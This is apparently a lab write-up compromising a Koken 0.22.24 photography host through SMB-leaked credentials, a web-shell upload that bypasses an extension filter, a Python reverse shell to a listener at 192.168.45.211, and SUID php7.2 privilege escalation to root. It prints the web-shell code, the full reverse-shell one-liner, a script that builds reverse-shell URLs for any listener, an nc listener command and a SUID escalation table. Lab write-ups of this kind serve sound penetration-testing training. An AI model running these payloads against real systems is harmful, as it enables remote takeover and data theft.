Target IP: 192.168.170.76
There are five TCP ports open on the machine: SSH, HTTP (port 80), SMB (ports 139 and 445), and a second HTTP service (port 8000). I will start my enumeration with the HTTP applications on ports 80 and 8000.
Port 80: HTTP
We are presented with the webpage above when we browse to this port. The username v1n1v131r4 is interesting. Reviewing the page source did not show anything important.
A directory search with gobuster dir -u http://192.168.170.76/ -w /usr/share/wordlists/dirb/big.txt -x php,html only points to /assets, which holds the static files for this application and is not very helpful.
Port 8000: HTTP
The webpage above is displayed when we visit port 8000 in a web browser. Could the text daisa ahomi be a name? Navigating around the site did not show anything interesting.
However, while reading through the source code, I found the name and version of the application running on this port: Koken 0.22.24.
A Google search leads to an unverified exploit for this version. It requires authentication before it can be fired against this port.
The directory scan with gobuster dir -u http://192.168.170.76:8000/ -w /usr/share/wordlists/dirb/big.txt -x php,html --exclude-length 0 gave interesting results.
The /admin/ directory hosts a sign-in page. Maybe we can find working credentials and sign in?
Ports 139 and 445: SMB
SMB is open and we have read access to a share called sambashare. This share contains two files: mailsent.txt and wordpress.bkp.zip. I downloaded both to my machine. The first file sounds interesting.
The mail contains the content above, and there is a lot of information in it. We get the names and emails of the two users of the HTTP applications. Could babygirl be a password? Apparently the application running on port 8000 belongs to daisa@photographer.com, so is daisa@photographer.com:babygirl a valid credential?
And it worked. Those credentials got me into the admin page. It looks like we have full control of the website as admin.
We have more information about the system as shown above. I want to exploit this machine manually rather than running the public exploit.
Now that we have access to the admin panel, it is time to exploit it.
I created a simple PHP web shell with the code <?php system($_GET['cmd']); ?> and named it shell.php.jpg. Uploading a plain .php file is refused by the application, so I used Burp Suite to get around that. After pressing Import content, selecting my web shell and pressing Import, I intercepted the POST request and changed the file name.
I removed the .jpg extension from the file name inside Burp Suite and then forwarded all the intercepted requests.
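The rename works because the extension check only runs before the request leaves the browser and the server then trusts whatever filename arrives in the multipart body. The following is an added example (not Koken's code) that models the weak behaviour observed above next to a hardened server-side check: an extension allowlist, a magic-byte check on the content, and a server-chosen file name so that a second extension like shell.php.jpg can never reach the web root. The allowlist, the paths and the sample uploads are constructed for the example.

```python
import secrets

# Allowlisted image types and the leading bytes each one must start with.
# The allowlist itself is an assumed policy for this example.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample uploads: the web shell used in the writeup and a
# minimal JPEG header (SOI + APP0 marker), enough to pass a magic check.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\x00" * 12


class UploadRejected(ValueError):
    pass


def browser_side_filter(filename):
    """The check the writeup ran into: a plain .php name is refused in the
    UI, but shell.php.jpg passes because only the last extension is looked
    at, and the check runs before the request leaves the browser."""
    return filename.lower().rsplit(".", 1)[-1] in ALLOWED


def store_weak(filename, data):
    """Server side as the bypass implies: the filename from the multipart
    body is trusted as-is, so stripping '.jpg' in Burp yields shell.php
    inside the web root. `data` is never inspected."""
    return "/storage/originals/" + filename


def store_hardened(filename, data):
    """Server-side validation that survives an intercepting proxy:
    extension allowlist, content sniffing, and a server-chosen name."""
    ext = filename.lower().rsplit(".", 1)[-1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} is not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match the declared image type")
    # Discard the client's name entirely: a second extension such as
    # shell.php.jpg can be mapped to a handler by Apache's AddHandler.
    return "/storage/originals/" + secrets.token_hex(16) + "." + ext


def hardened_accepts(filename, data):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        store_hardened(filename, data)
        return True
    except UploadRejected:
        return False
```

The magic-byte check is not a complete defence on its own: a valid JPEG with PHP appended still passes it, which is why the stored name is generated by the server and keeps only the validated image extension, and why the upload directory should not be served through a PHP handler at all.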
My PHP web shell was uploaded successfully. It is reachable at http://192.168.170.76:8000/storage/originals/e0/c9/shell.php.
And the PHP web shell works. Time to get a reverse shell.
In my testing the PHP reverse shells did not work, so I used Python instead. With the payload below I got a foothold on the machine.
Payload (URL-encoded): python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
Decoded, this is the usual Python connect-back one-liner pointing at my listener on 192.168.45.211:80: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.211",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Full URL with payload: http://192.168.170.76:8000/storage/originals/e0/c9/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
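Getting the one-liner through a GET parameter intact is the fiddly part: the quotes, parentheses, semicolons and the slash in /bin/bash all have to be percent-encoded, and any literal & or + would be eaten by the query-string parser. The following added example (not part of the original writeup) builds the same payload for an arbitrary listener address, encodes it the way the URL above is encoded, and decodes a captured URL back to the command, which is the same step a defender takes when reading this request out of a web-server log. The listener address, port and base URL are the ones from this page and are only parameters here.

```python
from urllib.parse import parse_qs, quote, urlsplit


def reverse_shell_oneliner(lhost, lport, shell="/bin/bash"):
    """The Python connect-back one-liner used above, with the listener
    address, port and spawned shell as parameters."""
    return (
        "python -c 'import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        f'import pty; pty.spawn("{shell}")' + "'"
    )


def encode_for_get(cmd):
    """Percent-encode everything except unreserved characters so quotes,
    parentheses, ';', '&' and '/' survive the query string unchanged
    (safe='' also encodes '/', which quote() would otherwise keep)."""
    return quote(cmd, safe="")


def webshell_url(base, cmd):
    """Full URL that makes shell.php run `cmd` via its cmd parameter."""
    return f"{base}?cmd={encode_for_get(cmd)}"


def decode_webshell_url(url):
    """Recover the command from a captured URL, e.g. from access logs."""
    return parse_qs(urlsplit(url).query)["cmd"][0]


if __name__ == "__main__":
    cmd = reverse_shell_oneliner("192.168.45.211", 80)
    base = "http://192.168.170.76:8000/storage/originals/e0/c9/shell.php"
    print(webshell_url(base, cmd))
```

Start the listener (for example nc -lvnp 80 on the attacking host) before requesting the URL; the web shell blocks until the spawned bash exits, so the request itself never returns while the session is alive.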
Looks like the PHP 7.2 binary has the SUID bit set. Because the interpreter itself is a native binary, the kernel honours the bit, and we can use it to gain root privileges.
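How the SUID binary is found and what to do with it, as an added example that is not from the original writeup: a scan equivalent to find / -perm -4000 -type f, and a small table that maps known interpreters to the GTFOBins-style command that keeps the elevated effective uid. The php entry is the GTFOBins technique (pcntl_exec into sh -p); the python entry is an assumed extension of the same idea. The fixture directory, the fake php7.2 file and the paths are constructed for the example.

```python
import os
import stat
import tempfile

# Interpreters that keep the effective uid when run SUID, with the
# escalation command to try. Matched on the basename prefix so that
# php7.2 or python3 are caught as well.
ESCALATION_HINTS = {
    "php": "{bin} -r \"pcntl_exec('/bin/sh', ['-p']);\"",
    "python": "{bin} -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}


def find_suid(root):
    """Equivalent of `find ROOT -perm -4000 -type f 2>/dev/null`: regular
    files under root with the setuid bit set, unreadable dirs skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def escalation_candidates(paths):
    """Map each SUID file whose basename starts with a known interpreter
    name to the command that abuses it."""
    out = {}
    for p in paths:
        base = os.path.basename(p).lower()
        for prefix, template in ESCALATION_HINTS.items():
            if base.startswith(prefix):
                out[p] = template.format(bin=p)
    return out


def demo():
    """Constructed fixture: a scratch directory with a fake SUID php7.2
    and a normal file, so the scan can be exercised without root."""
    d = tempfile.mkdtemp()
    php = os.path.join(d, "php7.2")
    other = os.path.join(d, "cat")
    for p in (php, other):
        with open(p, "wb") as f:
            f.write(b"#!/bin/sh\n")
    os.chmod(php, 0o4755)   # set the bit after writing; writes clear it
    os.chmod(other, 0o755)
    hits = find_suid(d)
    return hits, escalation_candidates(hits)


if __name__ == "__main__":
    for path, command in demo()[1].items():
        print(path, "->", command)
```

The php command depends on the pcntl extension being compiled into that binary; the -p flag keeps sh from dropping the effective uid back to the real one, which is the whole point of the exercise.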
And now we are root!
The local.txt flag is in daisa's home directory.
The proof.txt flag, read after using the php binary to elevate privileges to root.